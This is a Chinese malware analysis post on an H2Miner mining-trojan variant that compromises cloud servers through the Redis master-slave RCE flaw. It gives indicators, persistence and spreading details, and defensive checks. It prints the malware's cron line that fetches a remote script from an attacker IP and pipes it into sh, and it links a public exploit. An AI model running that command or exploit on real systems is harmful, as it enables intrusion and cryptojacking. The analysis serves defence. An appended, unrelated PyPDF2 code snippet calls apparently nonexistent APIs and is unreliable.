H2Miner变种,利用Redis漏洞入侵云服务器wa矿

H2Miner变种,最主要的特征是,入侵后 redis路径下很明显多了两个可执行的so文件,red2.so 和 exp_lin.so ;

在这里插入图片描述

该变种利用Redis 4.x/5.x 主从同步命令执行漏洞(CNVD-2019-21763)攻击云服务器,检测数据显示该木马活动有明显增长。H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。

2Miner变种木马入侵后会下载kinsingXXXXXXXXXX(10位随机字符)木马作为挖矿木马kdevtmpfsi的维持进程,并且通过安装定时任务持久化、通过SSH复用连接进行横向移动感染。H2Miner挖矿木马会占用大量CPU资源进行挖矿计算,可能导致业务系统崩溃,该挖矿木马还会尝试卸载云服务器的安全软件。腾讯安全专家建议企业用户按照以下步骤进行自查以及处置:

1.Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令;

2.修改配置文件,限制访问Redis服务器的IP地址(bind 127.0.0.1或指定IP);

3.排查Redis路径下是否残留red2.so、exp_lin.so文件,查询主机上是有否包含有kinsing(或kinsingXXXXXXXXXX)、kdevtmpfsi的文件或进程,是否有包含“195.3.146.118”的定时任务。

以上步骤可确认服务器是否被H2Miner挖矿木马感染,如有发现,可以删除相关进程文件及定时任务。

Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。

(https://github.com/Ridter/redis-rce/blob/master/redis-rce.py)

由于Redis 4.x以及之后的版本,Redis新增了模块功能,用户可以通过外部拓展实现用户需要的功能,这样就可以在Redis中实现一个新的Redis命令。攻击者利用此功能(由Redis的主机实例通过fullresync同步到从机),使被攻击机加载恶意的模块red2.so文件,从而实现远程命令执行。

在这里插入图片描述
ed2.so实现了shell命令的执行功能,可以接受攻击者指定的任意代码。
在这里插入图片描述
在这里插入图片描述
随后攻击者通过执行远程命令在Redis目录(/www/server/redis/)中下载了三个可执行文件并运行,文件名为kinsing+“10个随机字符”:

insinghoeF6X2YuD

kinsinghUvG9LNzhs

kinsingOtaaHxvErd

对比发现三个文件其实相同,推测可能是由于重复入侵导致。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。

kinsingXXXXXXXXXX在函数main_redisBrute中实现redis爆破攻击功能。

该样本会继续下载门罗币挖矿木马/tmp/kdevtmpfsi启动挖矿,导致大量CPU资源被占用,影响机器正常运转。

下载http[:]//45.10.88.124/al.sh,尝试卸载阿里云骑士和腾讯云镜。

下载http[:]//45.10.88.124/cron.sh,安装定时任务:

“* * * * * $LDR http[:]//195.3.146.118/unk.sh | sh > /dev/null 2>&1”

下载http[:]//45.10.88.124/spre.sh,尝试利用SSH连接复用进行横向移动:

与C2地址93.189.46.81通信。

  • 1930
    点赞
  • 1971
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pdfminer是一个用于从PDF文件中提取文本和元数据的Python库。它并不直接支持给PDF添加批注的功能,但我们可以通过使用其他库和技术来实现这一目标。 一种常见的方法是使用PyPDF2库。PyPDF2允许我们读取、合并和编辑PDF文件,包括添加批注。首先,我们需要安装PyPDF2库,可以通过pip命令进行安装。 然后,我们需要使用PyPDF2打开原始的PDF文件,并创建一个新的PDF文件对象以添加批注。接下来,我们可以通过调用addText方法来将批注添加到指定的页码上,并设置所需的注释文本和位置。 最后,我们需要将修改后的PDF文件保存到磁盘上。以下是一个示例代码: ```python import PyPDF2 def add_annotation_to_pdf(input_pdf_path, output_pdf_path, page_number, annotation_text, x, y): # 打开原始PDF文件 with open(input_pdf_path, "rb") as input_file: pdf_reader = PyPDF2.PdfReader(input_file) # 创建新的PDF文件 with open(output_pdf_path, "wb") as output_file: pdf_writer = PyPDF2.PdfWriter() # 将每一页复制到新文件中 for page in pdf_reader.pages: pdf_writer.add_page(page) # 在指定的页码上添加批注 page = pdf_writer.getPage(page_number) annotation = PyPDF2.pdf.PageAnnotation.create_text_annotation(pdf_writer, (x, y), annotation_text) page.add_annotation(annotation) # 保存修改后的PDF文件 pdf_writer.write(output_file) ``` 在上面的示例中,我们定义了一个add_annotation_to_pdf函数,它接受输入PDF文件路径,输出PDF文件路径,要添加批注的页码,批注文本以及批注位置的x和y坐标参数。通过调用这个函数,我们可以添加批注到目标PDF文件中。 请注意,PyPDF2并不支持直接编辑现有PDF文件中的现有批注。如果你需要修改已经存在的批注,可能需要使用其他的PDF编辑工具或库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值